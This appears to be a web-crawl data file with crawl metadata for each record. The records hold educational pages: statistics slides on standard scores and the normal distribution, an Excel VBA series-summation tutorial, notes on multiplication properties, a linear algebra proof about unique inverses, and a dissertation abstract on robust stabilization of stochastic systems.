https://studyres.com/doc/4238907/?page=27
[ "Survey\n\n* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project\n\nDocument related concepts\nno text concepts found\nTranscript\n```HKDSE Mathematics\nRonald Hui\nTak Sun Secondary School\nHomework\nSHW6-C1: Sam L\nSHW7-B1: Sam L\nSHW7-P1: Sam L\nSHW8-A1: Sam L\nSHW8-P1: Kelvin\nRE8: Sam L\nRonald HUI\nBook 5B Chapter 9\nApplications of Standard Deviation\nAngel’s\nmark\nMean mark of\nher class\nDifference\nChinese\n65\n62\n65 – 62 = 3\nEnglish\n72\n68\n72 – 68 = 4\nTest\nSince the difference between my mark\nand mean mark of the class is higher\nin English test, I perform better in\nEnglish test.\nConsider the following histograms which show the\ndistributions of marks of the class in the two subjects.\nAngel’s marks are indicated in the distribution by the\nyellow line.\nLet us look into the test\nresults in more details.\nIn which test, there are less students\nwhose marks are higher than Angel?\nAmong the two tests, there are less\nstudents have marks higher than\nAngel in Chinese test.\nFrom the above histograms, although the difference\nbetween Angel’s mark and the mean mark in English\ntest is higher than that in Chinese test, her performance\nis better in Chinese test when compared with other\nstudents in her class.\nFrom the above example, we can\nsee that Angel’s performance in different\ntests not only depends on the actual\nmarks or difference from the mean mark,\nbut also depends on the dispersion\nof the marks in the class.\nIn statistics, we use a measure called\nthe standard score to compare data\nfrom different data sets.\nStandard Score\nFor a set of data with mean x and standard\ndeviation , the standard score z of a given\ndatum x is defined as\nstandard score z \nxx\n\n◄ Standard score\nhas\nno unit.\nThe standard score measures how\nfar away a datum lies from the mean\nin units of the standard deviation.\nStandard Score\nFor a set of data with mean x and standard\ndeviation , the standard score z of a given\ndatum x is defined as\nstandard score z \nxx\n\n◄ Standard score\nhas\nno unit.\nIt is positive when the datum is\nabove mean and negative when\nthe datum is below mean.\nFor Chinese test,\nAngel’s mark (xC) = 65\nClass’ mean mark (xC) = 62\nStandard deviation (C) = 3\nFor English test,\nAngel’s mark (xE) = 72\nClass’ mean mark (xE) = 68\nStandard deviation (E) = 8\nStandard score (zC)\nStandard score (zE)\nxC  x C\n65  62\nzC \n\nC\n3\n 1  This means that Angel’s\n∵\n∴\nmark in Chinese is 1\nstandard deviation above\nthe mean.\n72  68\nxE  x E\n\nzE \n8\nE\n 0.5  This means that Angel’s\nmark in English is 0.5\nstandard deviation above\nthe mean.\nz C > zE\nAngel performs better in Chinese test.\nFollow-up question\nRefer to the following table.\nTest 1\nTimmy’s\nmark\n65\nTest 2\n72\nMean of Standard deviation\nthe class\nof the class\n68\n6\n74\n8\n(a) Find the standard scores of Timmy in the two tests.\n(b) In which test does Timmy perform better? Briefly\n65  68\nz\n\n 0.5\n(a) For test 1, 1\n6\n72  74\n 0.25\nFor test 2, z2 \n8\nFollow-up question\nRefer to the following table.\nTest 1\nTimmy’s\nmark\n65\nTest 2\n72\nMean of Standard deviation\nthe class\nof the class\n68\n6\n74\n8\n(a) Find the standard scores of Timmy in the two tests.\n(b) In which test does Timmy perform better? Briefly\n(b) ∵ z2 > z1\n∴ Timmy performs better in test 2.\nNormal Distribution\nThe article says many data\ndistribution. What is a\nnormal distribution?\nNormal distribution is one of\nthe most common and important\ndistributions in statistics. Many kinds of\nphysical and biological measurements\nsuch as heights, weights and Body\nMass Indexes (BMI) of the population\nThe frequency curve of a normal distribution is\nrepresented by a normal curve.\nNormal\ncurve\n\nThe normal curve gets closer and closer to the horizontal\naxis in both directions, but never touches it.\nThe mean x and the standard deviation  of a\ndistribution determine the location and the shape of\nits normal curve.\nThe characteristics of a normal curve include:\nNormal\ncurve\nreflectional symmetry\nbell-shaped\nmean, median and\nmode all equal to x\nIf a set of data follows the normal distribution, it has the\nfollowing properties.\n1. The curve is symmetrical about the mean x. So, there\nare 50% data above x , and 50% data below x.\n2. About 68% of the data lie within one standard deviation\nfrom the mean, i.e. the interval between x   and\nx  .\n3. About 95% of the data lie within two standard deviations\nfrom the mean, i.e. the interval between x  2 and\nx  2 .\n4. About 99.7% of the data lie within three standard\ndeviations from the mean, i.e. the interval between\nx  3 and x  3 .\nTo summarize, we can estimate the percentage of data falling\nbetween one, two and three standard deviations about the\nmean by the following diagram.\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(a)\nNormal Curve\nPercentage of data\nbetween\nx \nand\nx\n34%\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(b)\nNormal Curve\nPercentage of data\nbetween\nx  2\nand\nx  3\n97.35%\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(c)\nSmaller\nthan\nx  2\nNormal Curve\nPercentage of data\n97.5%\nExample:\nThe heights of 100 students are normally distributed with\na mean of 155 cm and a standard deviation of 8 cm.\nHow many students have heights between 147 cm\nand 163 cm?\nNormally distributed\n∵ 147 cm = (155 – 8) cm = x – \n163 cm = (155 + 8) cm = x + \n∴ The required number of students\n\n= 100  68%\n= 68\nmeans the data set\nfollows normal\ndistribution.\nFollow-up question\nThe weights of 100 students in a school are normally\ndistributed with a mean of 48 kg and a standard deviation\nof 10 kg. Find\n(a) the percentage,\n(b) the number\nof students who are over 58 kg.\n(a) ∵ 58 kg = (48 + 10) kg = x + \n∴ The required percentage\n\n= (50  34)%\n= 16 %\n34\nFollow-up question\nThe weights of 100 students in a school are normally\ndistributed with a mean of 48 kg and a standard deviation\nof 10 kg. Find\n(a) the percentage,\n(b) the number\nof students who are over 58 kg.\n(b) The required number of students\n= 100  16%\n= 16\n```\nRelated documents" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8929465,"math_prob":0.9285576,"size":6525,"snap":"2020-34-2020-40","text_gpt3_token_len":1590,"char_repetition_ratio":0.15488422,"word_repetition_ratio":0.32587063,"special_character_ratio":0.25578544,"punctuation_ratio":0.083524905,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.99628955,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-30T09:46:36Z\",\"WARC-Record-ID\":\"<urn:uuid:de71a1e5-4423-4796-931f-8b0f8553159f>\",\"Content-Length\":\"52495\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7046b5c4-3884-4d8e-8653-9dbba54bbca6>\",\"WARC-Concurrent-To\":\"<urn:uuid:b1d7f82e-2968-466c-88d0-365798ddbe5d>\",\"WARC-IP-Address\":\"172.67.151.140\",\"WARC-Target-URI\":\"https://studyres.com/doc/4238907/?page=27\",\"WARC-Payload-Digest\":\"sha1:L5DA5HITSIOMWNBUYORNS2FDUXKMF5IM\",\"WARC-Block-Digest\":\"sha1:C7BTKEU3ZHVRJSMW362LF6A75PXKJ4UV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402123173.74_warc_CC-MAIN-20200930075754-20200930105754-00466.warc.gz\"}"}
https://www.excel-easy.com/vba/examples/complex-calculations.html
[ "# Complex Calculations\n\nThe kth term, Tk, of a certain mathematical series is defined by the following formula:\n\n Tk = k2 + 6k + 1 9k + 7\n\nThe first term, T1, of the series is obtained by substituting k = 1 into the formula i.e.\n\n T1 = 12 + 6 + 1 = 1 and 9 + 7 2\n T2 = 22 + 12 + 1 = 17 ... and so on 18 + 7 25\n\nBelow we will look at a program in Excel VBA that calculates any term Tk and summation of terms up to N.", null, "Explanation: the user has the option to enter \"All\" or \"Odd\", to respectively calculate the sum of the first N terms of the series or the sum of only the odd terms up to N.\n\nPlace a command button on your worksheet and add the following code lines:\n\n1. First, we declare four variables of type Integer and one variable of type String.\n\nDim i, term, N, stepSize As Integer\nDim sumType As String\n\n2. Second, we initialize the variables.\n\ni = 0\nN = Range(\"C2\").Value\nsumType = Range(\"C3\").Value\n\n3. Empty the fields.\n\nRange(\"A8:B1000\").Value = \"\"\nRange(\"C6\").Value = \"\"\n\n4. Determine stepSize.\n\nSelect Case sumType\nCase Is = \"All\"\nstepSize = 1\nCase Is = \"Odd\"\nstepSize = 2\nCase Else\nMsgBox \"Enter a valid expression in cell C3\"\nEnd\nEnd Select\n\n5. Do the calculations.\n\nFor term = 1 To N Step stepSize\nCells(8 + i, 1).Value = term\nCells(8 + i, 2).Value = (term ^ 2 + (6 * term) + 1) / ((9 * term) + 7)\n\nRange(\"C6\").Value = Range(\"C6\").Value + Cells(8 + i, 2).Value\n\ni = i + 1\nNext term\n\nExplanation: we use the Step keyword to specify the increment (1 for \"All\" and 2 for \"Odd\") for the counter variable of the loop.\n\nResult:", null, "Go to Next Chapter: Macro Errors" ]
[ null, "https://www.excel-easy.com/vba/examples/images/complex-calculations/complex-calculations-example.png", null, "https://www.excel-easy.com/vba/examples/images/complex-calculations/complex-calculations-result.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74138963,"math_prob":0.998312,"size":1496,"snap":"2019-51-2020-05","text_gpt3_token_len":460,"char_repetition_ratio":0.11863271,"word_repetition_ratio":0.0,"special_character_ratio":0.33890375,"punctuation_ratio":0.13479623,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975175,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T07:27:32Z\",\"WARC-Record-ID\":\"<urn:uuid:7fc8d153-639f-4821-af35-0901ad3a2627>\",\"Content-Length\":\"16845\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aeb8cb35-47c2-49d5-8550-fa8ee9594563>\",\"WARC-Concurrent-To\":\"<urn:uuid:78df4151-0816-4749-8a7d-a50b2010af01>\",\"WARC-IP-Address\":\"185.87.187.11\",\"WARC-Target-URI\":\"https://www.excel-easy.com/vba/examples/complex-calculations.html\",\"WARC-Payload-Digest\":\"sha1:HXPNAITPEVU6WERGDJE4BIWAC5YP4EBA\",\"WARC-Block-Digest\":\"sha1:L7FSKSVGQFUAJ4MMKFLEQLEFXI5LWLWG\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251789055.93_warc_CC-MAIN-20200129071944-20200129101944-00211.warc.gz\"}"}
http://www.aaamath.com/B/mul74bx2.htm
[ "Multiplication Properties There are four properties involving multiplication that will help make problems easier to solve. They are the commutative, associative, multiplicative identity and distributive properties. Commutative property: When two numbers are multiplied together, the product is the same regardless of the order of the multiplicands. For example 4 * 2 = 2 * 4 Associative Property: When three or more numbers are multiplied, the product is the same regardless of the grouping of the factors. For example (2 * 3) * 4 = 2 * (3 * 4) Multiplicative Identity Property: The product of any number and one is that number. For example 5 * 1 = 5. Distributive property: The sum of two numbers times a third number is equal to the sum of each addend times the third number. For example 4 * (6 + 3) = 4*6 + 4*3 Return to Top" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83544016,"math_prob":0.9939406,"size":787,"snap":"2021-43-2021-49","text_gpt3_token_len":202,"char_repetition_ratio":0.15581098,"word_repetition_ratio":0.05839416,"special_character_ratio":0.25031766,"punctuation_ratio":0.104166664,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9978476,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T16:34:29Z\",\"WARC-Record-ID\":\"<urn:uuid:113a0d47-b36f-408d-98e8-c4c5f8df67cf>\",\"Content-Length\":\"7363\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:caf48d05-82a4-45ab-a0a3-d0a1cfdd3373>\",\"WARC-Concurrent-To\":\"<urn:uuid:0750c029-ac6c-4dfc-a2ef-0a7825f2bb39>\",\"WARC-IP-Address\":\"216.37.42.100\",\"WARC-Target-URI\":\"http://www.aaamath.com/B/mul74bx2.htm\",\"WARC-Payload-Digest\":\"sha1:ALXGORKSD34WR3TPIUUF2F532BJD63DE\",\"WARC-Block-Digest\":\"sha1:5JRLVOGMVU5LSK3DDGTBB22XHU2OOIMR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588216.48_warc_CC-MAIN-20211027150823-20211027180823-00582.warc.gz\"}"}
https://www.studysmarter.us/textbooks/math/linear-algebra-and-its-applications-5th/linear-equations-in-linear-algebra/q39q-let-tmathbbrn-to-mathbbrn-be-an-invertible-linear-trans/
[ "", null, "Suggested languages for you:\n\nEurope\n\nAnswers without the blur. Sign up and see all textbooks for free!", null, "Q39Q\n\nExpert-verified", null, "Found in: Page 1", null, "### Linear Algebra and its Applications\n\nBook edition 5th\nAuthor(s) David C. Lay, Steven R. Lay and Judi J. McDonald\nPages 483 pages\nISBN 978-03219822384", null, "# Let $$T:{\\mathbb{R}^n} \\to {\\mathbb{R}^n}$$ be an invertible linear transformation, and let S and U be functions from $${\\mathbb{R}^n}$$ into $${\\mathbb{R}^n}$$ such that $$S\\left( {T\\left( {\\mathop{\\rm x}\\nolimits} \\right)} \\right) = {\\mathop{\\rm x}\\nolimits}$$ and $$U\\left( {T\\left( {\\mathop{\\rm x}\\nolimits} \\right)} \\right) = {\\mathop{\\rm x}\\nolimits}$$ for all x in $${\\mathbb{R}^n}$$. Show that $$U\\left( v \\right) = S\\left( v \\right)$$ for all v in $${\\mathbb{R}^n}$$. This will show that T has a unique inverse, as asserted in theorem 9. (Hint: Given any v in $${\\mathbb{R}^n}$$, we can write $${\\mathop{\\rm v}\\nolimits} = T\\left( {\\mathop{\\rm x}\\nolimits} \\right)$$ for some x. Why? Compute $$S\\left( {\\mathop{\\rm v}\\nolimits} \\right)$$ and $$U\\left( {\\mathop{\\rm v}\\nolimits} \\right)$$).\n\nIt is proved that $$U\\left( v \\right) = S\\left( v \\right)$$.\n\nSee the step by step solution\n\n## Step 1: Show that T is onto mapping\n\nFor any v in $${\\mathbb{R}^n}$$, you can write $${\\mathop{\\rm v}\\nolimits} = T\\left( x \\right)$$ for some x (since $$T$$ is onto mapping).\n\n## Step 2: Show that $$U\\left( v \\right) = S\\left( v \\right)$$ for all v in $${\\mathbb{R}^n}$$\n\nAccording to the assumed properties of S and U, $$S\\left( v \\right) = S\\left( {T\\left( x \\right)} \\right) = x$$ and $$U\\left( v \\right) = U\\left( {T\\left( x \\right)} \\right) = x$$. Therefore, $$S\\left( v \\right)$$ and $$U\\left( v \\right)$$ are equal for any v.\n\nThis means that S and U are the same functions from $${\\mathbb{R}^n}$$ into $${\\mathbb{R}^n}$$.\n\nThus, it is proved that $$U\\left( v \\right) = S\\left( v \\right)$$.", null, "### Want to see more solutions like these?", null, "" ]
[ null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/dist/assets/images/header-logo.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/src/assets/images/ab-test/searching-looking.svg", null, "https://studysmarter-mediafiles.s3.amazonaws.com/media/textbook-images/Linear_Algebra.png", null, "https://studysmarter-mediafiles.s3.amazonaws.com/media/textbook-images/Linear_Algebra.png", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/src/assets/images/ab-test/businessman-superhero.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/img/textbook/banner-top.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/img/textbook/cta-icon.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6779361,"math_prob":1.0000063,"size":1829,"snap":"2023-14-2023-23","text_gpt3_token_len":696,"char_repetition_ratio":0.21917808,"word_repetition_ratio":0.11567164,"special_character_ratio":0.38545653,"punctuation_ratio":0.08791209,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000079,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T16:43:59Z\",\"WARC-Record-ID\":\"<urn:uuid:aa8348dc-6440-4310-8a20-62a4f7cf7ce7>\",\"Content-Length\":\"156896\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71e23b6b-1398-40e6-95d2-41160e3532f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:308ce05f-bdc6-4ed6-b1af-c1c78daa89a3>\",\"WARC-IP-Address\":\"18.194.226.228\",\"WARC-Target-URI\":\"https://www.studysmarter.us/textbooks/math/linear-algebra-and-its-applications-5th/linear-equations-in-linear-algebra/q39q-let-tmathbbrn-to-mathbbrn-be-an-invertible-linear-trans/\",\"WARC-Payload-Digest\":\"sha1:H6TQJM65Y3VRIV7KOZALMUMQNOMIQZUZ\",\"WARC-Block-Digest\":\"sha1:7FW2FAS4KTF6UNZVMEPKYV6B7QZPCPRD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949009.11_warc_CC-MAIN-20230329151629-20230329181629-00642.warc.gz\"}"}
https://digitalscholarship.tnstate.edu/dissertations/AAI1497845/
[ "# Robust Stability and Stabilization of a Class of Non-Linear Discrete-Time Stochastic Systems\n\n#### Abstract\n\nA problem of robust state feedback stability and stabilization of nonlinear discrete-time stochastic processes is considered. The linear rate vector of a discrete-time system is perturbed by a nonlinear function that satisfies a quadratic constraint. Our objective is to show how linear constant feedback laws can be formulated to stabilize this type of nonlinear discrete-time systems and, at the same time maximize the bounds on this nonlinear perturbing function which the system can tolerate without becoming unstable. The state dependent diffusion is modeled by a normal sequence of identically independently distributed random variables. The new formulation provides a suitable setting for robust stabilization of nonlinear discrete-time systems where the underlying deterministic system satisfy the generalized matching conditions. Our method which is based on linear matrix inequalities (LMIs) is distinctive from the existing robust control and absolute stability techniques. Examples are given to demonstrate the obtained results.\n\n#### Subject Area\n\nMathematics|Electrical engineering\n\n#### Recommended Citation\n\nAndre' J Strong, \"Robust Stability and Stabilization of a Class of Non-Linear Discrete-Time Stochastic Systems\" (2011). ETD Collection for Tennessee State University. Paper AAI1497845.\nhttps://digitalscholarship.tnstate.edu/dissertations/AAI1497845\n\nCOinS" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8569183,"math_prob":0.851535,"size":1460,"snap":"2019-35-2019-39","text_gpt3_token_len":268,"char_repetition_ratio":0.12843406,"word_repetition_ratio":0.06451613,"special_character_ratio":0.16575342,"punctuation_ratio":0.06849315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97360474,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-17T05:03:22Z\",\"WARC-Record-ID\":\"<urn:uuid:782d5c90-672f-46e7-9c67-aacf146d54d5>\",\"Content-Length\":\"29706\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c908fff-3491-40f3-9279-526d1fab9c50>\",\"WARC-Concurrent-To\":\"<urn:uuid:f6054242-1bfd-470c-8171-17b8a654afc3>\",\"WARC-IP-Address\":\"72.5.9.223\",\"WARC-Target-URI\":\"https://digitalscholarship.tnstate.edu/dissertations/AAI1497845/\",\"WARC-Payload-Digest\":\"sha1:K5FHQBK3YH7IANWWARQKZZZBIDOBLSIH\",\"WARC-Block-Digest\":\"sha1:2N2ITKB5REV3UW62LVBZ7PSYG2W5GXKN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573052.26_warc_CC-MAIN-20190917040727-20190917062727-00125.warc.gz\"}"}